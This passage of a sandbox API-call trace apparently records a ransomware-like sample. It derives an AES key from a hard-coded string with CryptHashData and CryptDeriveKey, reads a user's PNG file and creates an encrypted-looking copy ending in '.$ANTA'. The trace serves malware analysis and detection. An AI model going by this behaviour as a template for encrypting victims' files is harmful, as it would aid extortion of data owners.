35 [0093.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0093.459] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cab68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0093.460] CryptHashData (hHash=0x41ac6c0, pbData=0x17e2668, dwDataLen=0x22, dwFlags=0x1) returned 1 [0093.460] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.460] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0093.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0093.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cad00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0093.460] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac6c0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac700) returned 1 [0093.460] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0093.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0093.460] CryptDestroyHash (hHash=0x41ac6c0) returned 1 [0093.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0093.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0093.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0093.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0093.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0093.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0093.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0093.461] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0093.461] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0093.461] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0093.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0093.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0093.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0093.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0093.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0093.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0093.462] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\bflIcpkmQtP.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\bflicpkmqtp.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0093.462] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.462] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0093.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0093.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0093.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0093.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0093.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0093.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.463] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0093.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0093.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0093.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0093.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0093.463] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0093.463] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0093.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0093.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0093.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0093.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0093.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e4f0 [0093.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0093.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0093.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e4f0 | out: hHeap=0x1780000) returned 1 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0093.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0093.465] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0093.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0093.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0093.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0093.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0093.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.466] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\bflIcpkmQtP.png.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\bflicpkmqtp.png.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0093.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0093.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0093.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0093.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0093.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0093.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0093.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.467] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0093.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0093.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0093.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0093.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0093.468] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0093.468] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0093.468] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0093.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0093.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0093.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0093.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0093.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0093.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0093.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0093.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e02020 [0093.471] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0093.472] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x4ac0, lpOverlapped=0x0) returned 1 [0093.472] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0093.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0093.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0093.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0093.473] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4ac0) returned 0x4516010 [0093.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e02020 | out: hHeap=0x1780000) returned 1 [0093.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0093.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0093.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0093.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0093.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4ac0) returned 0x451aad8 [0093.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0093.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.476] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0093.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0093.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.476] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4ac0) returned 0x4516010 [0093.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0093.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0093.476] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0093.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.477] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0093.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0093.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.477] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0093.477] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0093.477] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.477] 